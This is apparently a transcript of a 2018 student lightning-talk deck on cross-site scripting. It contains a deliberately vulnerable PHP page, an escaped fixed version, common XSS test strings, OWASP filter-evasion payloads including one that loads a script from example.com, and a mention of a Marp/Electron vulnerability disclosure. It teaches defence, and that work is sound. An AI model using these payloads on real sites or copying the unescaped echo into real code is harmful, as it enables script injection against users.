Investigating XSS input values / searching xss insertion value
Tomoyuki KOYAMA
February 03, 2018
2018/02/03 Student LT at freee
Transcript
XSS
B1. Twitter: @tmyk_kym. https://blog.koyama.me/. Network/Web/Server/Security. PyCon JP, Seccamp, etc.
XSS (Cross Site Scripting), HTML. CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (3.0)
Sample page (the value of $_GET['mode'] is written straight into the HTML):

<!doctype html>
<meta charset="utf-8">
<title>XSS Sample</title>
<h1><?php echo $_GET['mode']; ?></h1>

With $_GET['mode'] = hello the output is:

<!doctype html>
<meta charset="utf-8">
<title>XSS Sample</title>
<h1>hello</h1>

With $_GET['mode'] = <script>alert()</script> the output is:

<!doctype html>
<meta charset="utf-8">
<title>XSS Sample</title>
<h1><script>alert()</script></h1>
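The same page with the reflected value HTML-encoded at output time, as an added example that is not code from the deck; render_heading() and the list of test strings are my own names and constructed inputs:

```php
<?php
// Added example (not from the deck): the sample page above, but the value of
// $_GET['mode'] is passed through htmlspecialchars() before it is written
// into the HTML. With ENT_QUOTES the characters < > & " ' become character
// references, so the browser renders them as text instead of parsing markup.
declare(strict_types=1);

function render_heading(string $mode): string
{
    $safe = htmlspecialchars($mode, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<!doctype html>' . "\n"
        . '<meta charset="utf-8">' . "\n"
        . '<title>XSS Sample</title>' . "\n"
        . '<h1>' . $safe . '</h1>' . "\n";
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: the test strings used in the deck. Running this
    // from the command line prints each one encoded inside the <h1>.
    $payloads = [
        'hello',
        '<script>alert()</script>',
        '"><script>alert(1)</script>',
        '" onmouseover="alert(1)',
    ];
    foreach ($payloads as $p) {
        echo render_heading($p);
    }
} else {
    // Web entry point: same behaviour as the deck's page, with encoding.
    header('Content-Type: text/html; charset=utf-8');
    echo render_heading($_GET['mode'] ?? '');
}
```

This encoding is sufficient for HTML text and quoted attribute values; for the a href case on a later slide, where javascript: needs no angle brackets or quotes, the URL scheme itself has to be validated as well.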
Types of XSS: Stored XSS, Reflected XSS, DOM Based XSS
XSS == XSS
Typical test strings:
- <script>alert(1)</script>
- "><script>alert(1)</script>
- " onmouseover="alert(1)
- x" onerror="alert(1)   (inserted into img src)
- javascript:alert(1)   (inserted into a href)
XSS
OWASP XSS Filter Evasion Cheat Sheet (2015): https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
Three examples from it:
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
    The slash is treated as an attribute separator, so the browser parses this as:
    <script xss="" src="http://example.com/xss.js"></script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT>
    The HTML parser tolerates the extra <; parsed as:
    "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')>   (with &#x... hexadecimal HTML character references at the gaps)
    The character references inside the attribute value are decoded, so it becomes:
    <img src="x" onerror="javascript:alert('XSS')">
Other entries looked at:
- <img src=javascript:alert('XSS')>
- <img src=javascript: alert(String.fromCharCode(88,83,83))>
- <META HTTP-EQUIV="refresh" CONTENT="3; URL=http://;URL=http://yahoo.co.jp/;">
Electron / Marp: Marp is an Electron app, so its slides are rendered as web content ... <script>alert()</script> ... alert ...
JVN#21174546: JavaScript execution in Marp: https://jvn.jp/jp/JVN21174546/
“However, sanitizing inline script should consider on future.” ([Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp)
XSS XSS alert() Electron